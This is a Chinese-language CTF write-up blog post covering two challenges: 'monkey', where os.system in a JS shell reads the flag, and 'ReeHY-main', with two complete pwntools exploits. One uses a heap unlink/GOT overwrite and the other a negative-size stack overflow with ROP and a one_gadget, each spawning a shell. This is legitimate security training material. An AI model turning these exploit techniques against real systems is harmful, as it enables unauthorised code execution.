<!DOCTYPE html>
<html lang="en">
<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="google-site-verification" content="xBT4GhYoi5qRD5tr338pgPM5OWHHIDR6mNg1a3euekI">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content>
    <meta name="keyword" content>
    <link rel="shortcut icon" href="/img/favicon.ico">

    <title>
        
        攻防世界-ReeHYMain&amp;monkey - 一筐萝卜
        
    </title>

    <!-- Custom CSS -->
    <link rel="stylesheet" href="/css/aircloud.css">
    <link rel="stylesheet" href="/css/gitment.css">
    <!--<link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css">-->
    <link href="//at.alicdn.com/t/font_620856_pl6z7sid89qkt9.css" rel="stylesheet" type="text/css">
    <!-- ga & ba script hoook -->
    <script></script>
</head>

<body>

<div class="site-nav-toggle" id="site-nav-toggle">
    <button>
        <span class="btn-bar"></span>
        <span class="btn-bar"></span>
        <span class="btn-bar"></span>
    </button>
</div>

<div class="index-about">
    <i> 你若盛开，清风自来！ </i>
</div>

<div class="index-container">
    
    <div class="index-left">
        
<div class="nav" id="nav">
    <div class="avatar-name">
        <div class="avatar radius">
            <img src="/img/avatar.jpg">
        </div>
        <div class="name">
            <i>一筐萝卜</i>
        </div>
    </div>
    <div class="contents" id="nav-content">
        <ul>
            <li>
                <a href="/">
                    <i class="iconfont icon-shouye1"></i>
                    <span>主页</span>
                </a>
            </li>
            <li>
                <a href="/tags">
                    <i class="iconfont icon-biaoqian1"></i>
                    <span>标签</span>
                </a>
            </li>
            <li>
                <a href="/archives">
                    <i class="iconfont icon-guidang2"></i>
                    <span>存档</span>
                </a>
            </li>
            <li>
                <a href="/about/">
                    <i class="iconfont icon-guanyu2"></i>
                    <span>关于</span>
                </a>
            </li>
            
            <li>
                <a id="search">
                    <i class="iconfont icon-sousuo1"></i>
                    <span>搜索</span>
                </a>
            </li>
            
        </ul>
    </div>
    
        <div id="toc" class="toc-article">
    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#monkey"><span class="toc-text">monkey</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-ReeHY-main-100"><span class="toc-text">4-ReeHY-main-100</span></a></li></ol>
</div>
    
</div>


<div class="search-field" id="search-field">
    <div class="search-container">
        <div class="search-input">
            <span id="esc-search"> <i class="icon-fanhui iconfont"></i></span>
            <input id="search-input">
            <span id="begin-search">搜索</span>
        </div>
        <div class="search-result-container" id="search-result-container">

        </div>
    </div>
</div>

        <div class="index-about-mobile">
            <i> 你若盛开，清风自来！ </i>
        </div>
    </div>
    
    <div class="index-middle">
        <!-- Main Content -->
        


<div class="post-container">
    <div class="post-title">
        攻防世界-ReeHYMain&amp;monkey
    </div>

    <div class="post-meta">
        <span class="attr">发布于：<span>2019-07-29 23:12:00</span></span>
        
        <span class="attr">标签：/
        
        <a class="tag" href="/tags/#WP" title="WP">WP</a>
        <span>/</span>
        
        
        </span>
        <span class="attr">访问：<span id="busuanzi_value_page_pv"></span>
</span>

    </div>
    <div class="post-content no-indent">
        <h2 id="monkey"><a href="#monkey" class="headerlink" title="monkey"></a>monkey</h2><p>下载之后有四个文件，并不知道时啥文件，尝试这运行一下</p>
<figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">一筐萝卜➜ jsshell-linux-x86_64  ./js</span><br><span class="line">js&gt; <span class="number">123</span></span><br><span class="line"><span class="number">123</span></span><br><span class="line">js&gt; <span class="number">456</span></span><br><span class="line"><span class="number">456</span></span><br><span class="line">js&gt;</span><br></pre></td></tr></table></figure>
<p>js的终端？   emmm  看了会儿没什么思路，太菜了</p>
<p>看了<a href="https://impakho.com/post/bctf-2017-online-writeup" target="_blank" rel="noopener">Writeup</a></p>
<p>思路：</p>
<ul>
<li>看到像终端，联想到help命令<figure class="highlight actionscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">js&gt; help</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">help</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    [<span class="keyword">native</span> code]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
</li>
</ul>
<p>通过看回显可以发现确实有help这个函数，函数的格式<code>help()</code></p>
<ul>
<li>输入<code>help()</code>，发现存在<code>os.system()</code>，函数</li>
<li>尝试着用<code>os.system()</code>执行系统命令，发现可以执行</li>
</ul>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">C:\&gt;nc<span class="selector-class">.exe</span> <span class="number">111.198</span>.<span class="number">29.45</span> <span class="number">32609</span></span><br><span class="line">js&gt; os.system(<span class="string">"ls"</span>)</span><br><span class="line">os.system(<span class="string">"ls"</span>)</span><br><span class="line">bin</span><br><span class="line">dev</span><br><span class="line">flag</span><br><span class="line">js</span><br><span class="line">lib</span><br><span class="line">lib32</span><br><span class="line">lib64</span><br><span class="line">libnspr4.so</span><br><span class="line">libplc4.so</span><br><span class="line">libplds4.so</span><br><span class="line">run.sh</span><br><span class="line">js&gt; os.system(<span class="string">"cat flag"</span>)</span><br><span class="line">os.system(<span class="string">"cat flag"</span>)</span><br><span class="line">cyberpeace&#123;<span class="number">1182</span>e6319061286cb388734be7e2ba7f&#125;</span><br><span class="line">js&gt;</span><br></pre></td></tr></table></figure>
<p>好吧，拿到了flag</p>
<h2 id="4-ReeHY-main-100"><a href="#4-ReeHY-main-100" class="headerlink" title="4-ReeHY-main-100"></a>4-ReeHY-main-100</h2><p>查保护</p>
<figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">一筐萝卜➜</span> <span class="string">attachments</span>  <span class="string">checksec</span> <span class="bullet">--file</span> <span class="string">pwn</span> </span><br><span class="line"><span class="string">[*]</span> <span class="string">'/root/ctf/attachments/pwn'</span></span><br><span class="line"><span class="attr">    Arch:</span>     <span class="string">amd64-64-little</span></span><br><span class="line"><span class="attr">    RELRO:</span>    <span class="string">Partial</span> <span class="string">RELRO</span></span><br><span class="line"><span class="attr">    Stack:</span>    <span class="literal">No</span> <span class="string">canary</span> <span class="string">found</span></span><br><span class="line"><span class="attr">    NX:</span>       <span class="string">NX</span> <span class="string">enabled</span></span><br><span class="line"><span class="attr">    PIE:</span>      <span class="literal">No</span> <span class="string">PIE</span> <span class="string">(0x400000)</span></span><br></pre></td></tr></table></figure>
<p>尝试运行一下发现是一道菜单题，感觉题目考察点是堆</p>
<p>拖入IDA审计</p>
<p>存在增删改选项，show选项是个假的，并不能puts</p>
<p>漏洞点：在<code>delete chunk</code>时，heap chunk pointer未指向Null</p>
<p>利用：首先申请两个大小相等的堆块，然后依此释放掉，再申请两倍大小的chunk，那么这次chunk就是刚刚两个合并后的chunk，chunk地址是第一个的地址，然后我们编辑第二个chunk，构造chunk，完成unlink 攻击，覆盖got表，puts泄露真实地址，system拿到shell</p>
<p>exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug:</span><br><span class="line">    r = process(<span class="string">"./pwn"</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    r = remote(<span class="string">"111.198.29.45"</span>,<span class="number">55722</span>)</span><br><span class="line">file = ELF(<span class="string">"./pwn"</span>)</span><br><span class="line">libc = ELF(<span class="string">"./libc-2.23.so"</span>)</span><br><span class="line"><span class="comment"># r = remote("111.198.29.45",55722)</span></span><br><span class="line">sl = <span class="keyword">lambda</span> x : r.sendline(x)</span><br><span class="line">sd = <span class="keyword">lambda</span> x : r.send(x)</span><br><span class="line">sla = <span class="keyword">lambda</span> x,y : r.sendlineafter(x,y)</span><br><span class="line">rud = <span class="keyword">lambda</span> x : r.recvuntil(x,drop=<span class="literal">True</span>)</span><br><span class="line">ru = <span class="keyword">lambda</span> x : r.recvuntil(x)</span><br><span class="line">li = <span class="keyword">lambda</span> name,x : log.info(name+<span class="string">":"</span>+hex(x))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">wel</span><span class="params">()</span>:</span></span><br><span class="line">    ru(<span class="string">"$ "</span>)</span><br><span class="line">    sd(<span class="string">"radish"</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">create</span><span class="params">(index,size,con)</span>:</span></span><br><span class="line">    ru(<span class="string">"$ "</span>)</span><br><span class="line">    sd(<span class="string">"1"</span>)</span><br><span class="line">    ru(<span class="string">"Input size\n"</span>)</span><br><span class="line">    sd(str(size))</span><br><span class="line">    ru(<span class="string">"Input cun\n"</span>)</span><br><span class="line">    sd(str(index))</span><br><span class="line">    ru(<span class="string">"Input content\n"</span>)</span><br><span class="line">    sd(con)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span><span class="params">(index)</span>:</span></span><br><span class="line">    ru(<span class="string">"$ "</span>)</span><br><span class="line">    sd(<span class="string">"2"</span>)</span><br><span class="line">    ru(<span class="string">"Chose one to dele\n"</span>)</span><br><span class="line">    sd(str(index))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span><span class="params">(index,con)</span>:</span></span><br><span class="line">    ru(<span class="string">"$ "</span>)</span><br><span class="line">    sd(<span class="string">"3"</span>)</span><br><span class="line">    ru(<span class="string">"Chose one to edit\n"</span>)</span><br><span class="line">    sd(str(index))</span><br><span class="line">    ru(<span class="string">"Input the content\n"</span>)</span><br><span class="line">    sd(con)</span><br><span class="line"></span><br><span class="line">target_addr=  <span class="number">0x6020E0</span></span><br><span class="line">fd=target_addr - <span class="number">0x18</span></span><br><span class="line">bk=target_addr - <span class="number">0x10</span></span><br><span class="line">fake_chunk=<span class="string">'a'</span>*<span class="number">0x8</span> <span class="comment"># prev_size</span></span><br><span class="line">fake_chunk+=p64(<span class="number">0x81</span>) <span class="comment"># size</span></span><br><span class="line">fake_chunk+=p64(fd)+p64(bk)</span><br><span class="line">fake_chunk+=<span class="string">'a'</span>* <span class="number">0x60</span><span class="comment">#padding</span></span><br><span class="line">fake_chunk+=p64(<span class="number">0x80</span>)</span><br><span class="line">fake_chunk+=p64(<span class="number">0x90</span>)</span><br><span class="line"></span><br><span class="line">wel()</span><br><span class="line">create(<span class="number">0</span>,<span class="number">0x80</span>,<span class="string">"a"</span>*<span class="number">0x80</span>)</span><br><span class="line">create(<span class="number">1</span>,<span class="number">0x80</span>,<span class="string">"b"</span>*<span class="number">0x80</span>)</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">create(<span class="number">0</span>,<span class="number">0x110</span>,fake_chunk)</span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> <span class="string">"--------------unlink success!------------------"</span></span><br><span class="line"></span><br><span class="line">free_got = file.got[<span class="string">'free'</span>]</span><br><span class="line">puts_got = file.got[<span class="string">'puts'</span>]</span><br><span class="line">puts_plt = file.plt[<span class="string">'puts'</span>]</span><br><span class="line">pay  = <span class="string">"o"</span>*<span class="number">0x18</span></span><br><span class="line">pay += p64(<span class="number">0x6020E0</span>)+p64(<span class="number">1</span>)</span><br><span class="line">pay += p64(free_got)+p64(<span class="number">1</span>)</span><br><span class="line">pay += p64(puts_got)+p64(<span class="number">1</span>)</span><br><span class="line">edit(<span class="number">0</span>,pay)</span><br><span class="line">edit(<span class="number">1</span>,p64(puts_plt))</span><br><span class="line"><span class="comment"># delete(2)</span></span><br><span class="line">ru(<span class="string">"$ "</span>)</span><br><span class="line">sd(<span class="string">"2"</span>)</span><br><span class="line">ru(<span class="string">"Chose one to dele\n"</span>)</span><br><span class="line">sd(str(<span class="number">2</span>))</span><br><span class="line">puts_addr = u64(rud(<span class="string">"\x0a"</span>)+<span class="string">"\x00\x00"</span>)</span><br><span class="line">li(<span class="string">"puts_addr"</span>,puts_addr)</span><br><span class="line">base_addr = puts_addr-libc.symbols[<span class="string">'puts'</span>]</span><br><span class="line">system_addr = base_addr+libc.symbols[<span class="string">'system'</span>]</span><br><span class="line">create(<span class="number">3</span>,<span class="number">0x30</span>,<span class="string">"/bin/sh\x00"</span>)</span><br><span class="line">edit(<span class="number">1</span>,p64(system_addr))</span><br><span class="line">delete(<span class="number">3</span>)</span><br><span class="line"><span class="comment"># gdb.attach(r)</span></span><br><span class="line"><span class="comment"># raw_input()</span></span><br><span class="line"><span class="comment"># r.recv()</span></span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<p>通过看其他人的WP发现还有一种解法——栈溢出</p>
<p>漏洞点在create处</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">signed</span> <span class="keyword">int</span> <span class="title">create</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">signed</span> <span class="keyword">int</span> result; <span class="comment">// eax</span></span><br><span class="line">  <span class="keyword">char</span> buf; <span class="comment">// [rsp+0h] [rbp-90h]</span></span><br><span class="line">  <span class="keyword">void</span> *dest; <span class="comment">// [rsp+80h] [rbp-10h]</span></span><br><span class="line">  <span class="keyword">int</span> v3; <span class="comment">// [rsp+88h] [rbp-8h]</span></span><br><span class="line">  <span class="keyword">size_t</span> nbytes; <span class="comment">// [rsp+8Ch] [rbp-4h]</span></span><br><span class="line"></span><br><span class="line">  result = dword_6020AC;</span><br><span class="line">  <span class="keyword">if</span> ( dword_6020AC &lt;= <span class="number">4</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"Input size"</span>);</span><br><span class="line">    result = sub_400C55();</span><br><span class="line">    LODWORD(nbytes) = result;</span><br><span class="line">    <span class="keyword">if</span> ( result &lt;= <span class="number">0x1000</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="built_in">puts</span>(<span class="string">"Input cun"</span>);</span><br><span class="line">      result = sub_400C55();</span><br><span class="line">      v3 = result;</span><br><span class="line">      <span class="keyword">if</span> ( result &lt;= <span class="number">4</span> )</span><br><span class="line">      &#123;</span><br><span class="line">        dest = <span class="built_in">malloc</span>(nbytes);</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">"Input content"</span>);</span><br><span class="line">        <span class="keyword">if</span> ( nbytes &gt; <span class="number">0x70</span> )</span><br><span class="line">        &#123;</span><br><span class="line">          read(<span class="number">0</span>, dest, nbytes);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        &#123;</span><br><span class="line">          read(<span class="number">0</span>, &amp;buf, nbytes);</span><br><span class="line">          <span class="built_in">memcpy</span>(dest, &amp;buf, nbytes);</span><br><span class="line">        &#125;</span><br><span class="line">        *(size_list + <span class="number">4L</span>L * v3) = nbytes;</span><br><span class="line">        *(&amp;heap_list + <span class="number">2</span> * v3) = dest;</span><br><span class="line">        sign_list[<span class="number">4</span> * v3] = <span class="number">1</span>;</span><br><span class="line">        ++dword_6020AC;</span><br><span class="line">        result = fflush(<span class="built_in">stdout</span>);</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>当size小于0x70时，输入的内容会先存到栈上，然后copy到堆上，这里如果输入负数的话，逻辑上小于0x70，但是可以输入很长的字符串，那么可以造成栈溢出</p>
<p>我当时直接覆盖ret地址，发现失败了，后来发现需要构造栈上的数据，memcpy的三个参数都在栈上，需要构造满足这个函数</p>
<p>得知构造成<code>\x00</code>就可以绕过去，然后接下来的操作就是平常栈溢出的操作了</p>
<p>exp：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug:</span><br><span class="line">    r = process(<span class="string">"./pwn"</span>)</span><br><span class="line">    libc = ELF(<span class="string">"/lib/x86_64-linux-gnu/libc.so.6"</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    r = remote(<span class="string">"111.198.29.45"</span>,<span class="number">55722</span>)</span><br><span class="line">    libc = ELF(<span class="string">"./libc-2.23.so"</span>)</span><br><span class="line"></span><br><span class="line">sl = <span class="keyword">lambda</span> x : r.sendline(x)</span><br><span class="line">sd = <span class="keyword">lambda</span> x : r.send(x)</span><br><span class="line">sla = <span class="keyword">lambda</span> x,y : r.sendlineafter(x,y)</span><br><span class="line">rud = <span class="keyword">lambda</span> x : r.recvuntil(x,drop=<span class="literal">True</span>)</span><br><span class="line">ru = <span class="keyword">lambda</span> x : r.recvuntil(x)</span><br><span class="line">li = <span class="keyword">lambda</span> name,x : log.info(name+<span class="string">":"</span>+hex(x))</span><br><span class="line"></span><br><span class="line">ru(<span class="string">"$ "</span>)</span><br><span class="line">sd(<span class="string">"radish"</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">create</span><span class="params">(index,con)</span>:</span></span><br><span class="line">    ru(<span class="string">"$ "</span>)</span><br><span class="line">    sd(<span class="string">"1"</span>)</span><br><span class="line">    ru(<span class="string">"Input size\n"</span>)</span><br><span class="line">    sd(<span class="string">"-1"</span>)</span><br><span class="line">    ru(<span class="string">"Input cun\n"</span>)</span><br><span class="line">    sd(str(index))</span><br><span class="line">    ru(<span class="string">"Input content\n"</span>)</span><br><span class="line">    sd(con)</span><br><span class="line"></span><br><span class="line">file = ELF(<span class="string">"./pwn"</span>)</span><br><span class="line">put_plt = file.plt[<span class="string">'puts'</span>]</span><br><span class="line">put_got = file.got[<span class="string">'puts'</span>]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">main_addr = <span class="number">0x000000000400C8C</span></span><br><span class="line">offset = <span class="number">0x90</span>+<span class="number">8</span></span><br><span class="line">pop_rdi = <span class="number">0x0000000000400da3</span></span><br><span class="line">pay = offset*<span class="string">"\x00"</span>+p64(pop_rdi)+p64(put_got)+p64(put_plt)+p64(main_addr)</span><br><span class="line">create(<span class="number">0</span>,pay)</span><br><span class="line">puts_addr = u64(rud(<span class="string">"\x0a"</span>)+<span class="string">"\x00\x00"</span>)</span><br><span class="line">li(<span class="string">"puts_addr"</span>,puts_addr)</span><br><span class="line">base_addr = puts_addr-libc.symbols[<span class="string">'puts'</span>]</span><br><span class="line">li(<span class="string">"base_addr"</span>,base_addr)</span><br><span class="line">system_addr = base_addr+libc.symbols[<span class="string">'system'</span>]</span><br><span class="line">binsh_addr = <span class="number">0x000000000018cd57</span>+base_addr</span><br><span class="line">one_gg = <span class="number">0x45216</span>+base_addr</span><br><span class="line">pay = offset*<span class="string">"\x00"</span>+p64(one_gg)</span><br><span class="line">ru(<span class="string">"$ "</span>)</span><br><span class="line">sd(<span class="string">"radish"</span>)</span><br><span class="line">create(<span class="number">1</span>,pay)</span><br><span class="line">sleep(<span class="number">0.2</span>)</span><br><span class="line">r.interactive()</span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">0x45216 execve("/bin/sh", rsp+0x30, environ)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string">  rax == NULL</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">0x4526a execve("/bin/sh", rsp+0x30, environ)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string">  [rsp+0x30] == NULL</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">0xf02a4 execve("/bin/sh", rsp+0x50, environ)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string">  [rsp+0x50] == NULL</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">0xf1147 execve("/bin/sh", rsp+0x70, environ)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string">  [rsp+0x70] == NULL</span></span><br><span class="line"><span class="string">'''</span></span><br></pre></td></tr></table></figure></p>
<p>通过做这道题，涨了好多知识！</p>

        
        <br>
        <div id="comment-container">
        </div>
        <div id="disqus_thread"></div>

        <div id="lv-container">
        </div>

    </div>
</div>

    </div>
</div>


<footer class="footer">
    <ul class="list-inline text-center">
        
        

        

        

        

        

    </ul>
    
    <p>
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        转发请备注<a href="“https://luobuming.github.io”">一筐萝卜</a>的个人博客 <br>
        本站总访问量<span id="busuanzi_value_site_pv"></span>次
       </p>
</footer>




</body>

<script>
    // We expose some of the variables needed by the front end
    window.hexo_search_path = "search.json"
    window.hexo_root = "/"
    window.isPost = true
</script>
<script src="https://cdn.bootcss.com/jquery/3.3.1/jquery.min.js"></script>
<script src="/js/index.js"></script>
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>




</html>
